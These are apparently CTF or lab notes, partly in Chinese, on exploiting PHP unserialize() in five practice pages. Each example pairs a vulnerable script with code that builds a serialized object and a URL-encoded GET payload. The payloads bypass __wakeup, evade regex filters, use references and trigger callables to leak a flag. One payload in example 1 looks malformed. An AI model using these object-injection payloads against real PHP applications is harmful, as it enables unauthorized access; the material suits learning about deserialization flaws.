unserialize serialize

example 1

<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
else
die('Wrong filename.');
}
}
function __wakeup(){
$this->file='index.php';
}
}
if (!isset($_GET['tryhackme'])){
show_source(__FILE__);
}
else{
$a=$_GET['tryhackme'];
unserialize($a);
}
?>

write new php to encode

<?php
class SoFun{
protected $file='flag.php';
}
$a = new SoFun();
echo urlencode(serialize($a));
?>

GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

can see the flag

改变 O:5:“SoFun”:1:{s:7:“*file”;s:8:“flag.php”;} to O:5:“SoFun”:2:{s:7:“*file”;s:8:“flag.php”;} 可以防止__wakeup()方法执行 GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

example 2

<?php
include "flag.php";
class funny{
    function __wakeup(){
        global $flag;
        echo $flag;
    }
}
if (isset($_GET['tryhackme'])){
    $a = $_GET['tryhackme'];
    if(preg_match('/[oc]:\d+:/i', $a)){
        die("NONONO!");
    } else {
        unserialize($a);
    }
} else {
    show_source(__FILE__);
}

<?php
class funny{
}
$a = new funny();
echo serialize($a);
?>

O:5:“funny”:0:{} to O:+5:“funny”:0:{} and URL encode GET /un2.php?tryhackme=O%3A%2B5%3A%22funny%22%3A0%3A%7B%7D

example 3

 <!-un3.php-->
<?php
include "flag.php";
class funny{
    private $password;
    public $verify;
    function __wakeup(){
        global $nobodyknow;
        global $flag;
        $this->password = $nobodyknow;
        if ($this->password === $this->verify){
            echo $flag;
        } else {
            echo "Hacking??!";
        }
    }
}
if (isset($_GET['tryhackme'])){
    $a = $_GET['tryhackme'];
    unserialize($a);
} else {
    show_source(__FILE__);
}
?>

构造: $o->verify = &$o->password; //构造时需要将password的属性改为public

class funny{
    private $password;
    public $verify;
    function __construct(){
        $this->verify = &$this->password;
    }
}
$a = new funny();
echo serialize($a);
echo urlencode(serialize($a));

GET /un3.php?tryhackme=O%3A5%3A%22funny%22%3A2%3A%7Bs%3A15%3A%22%00funny%00password%22%3BN%3Bs%3A6%3A%22verify%22%3BR%3A2%3B%7D

example 4

 <?php
include "flag.php";
class funny{
    private $a;
    function __construct() {
        $this->a = "givemeflag";
    }
    function __destruct() {
        global $flag;
        if ($this->a === "givemeflag") {
        echo $flag;
        }
    }
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
    $a = $_GET['tryhackme'];
    for($i=0;$i<strlen($a);$i++){
        if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {
            die("hacker!");
    }
}
unserialize($a);
} else {
    show_source(__FILE__);
}

class funny{
    private $a;
    function __construct() {
        $this->a = "givemeflag";
    }
}
$a = new funny();
echo serialize($a);
echo urlencode(serialize($a));

O:5:“funny”:1:{s:8:“funnya”;s:10:“givemeflag”;} to O:5:“funny”:1:{S:8:“\00funny\00a”;s:10:“givemeflag”;} and urlencode GET /un5.php?tryhackme=O%3A5%3A%22funny%22%3A1%3A%7BS%3A8%3A%22%5C00funny%5C00a%22%3Bs%3A10%3A%22givemeflag%22%3B%7D

example 5

 <!-un6.php-->
<?php
include "flag.php";
ini_set('display_errors',true);
error_reporting(E_ALL | E_STRICT);
class funny{
    public function pyflag(){
        global $flag;
        echo $flag;
    }
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
    $a = unserialize($_GET['tryhackme']);
    var_dump($a);
    $a();
} else {
    show_source(__FILE__);
}
?> 

class funny{}
$a = array(new funny(),"pyflag");
echo serialize($a);
echo urlencode(serialize($a));

GET /un6.php?tryhackme=a%3A2%3A%7Bi%3A0%3BO%3A5%3A%22funny%22%3A0%3A%7B%7Di%3A1%3Bs%3A6%3A%22pyflag%22%3B%7D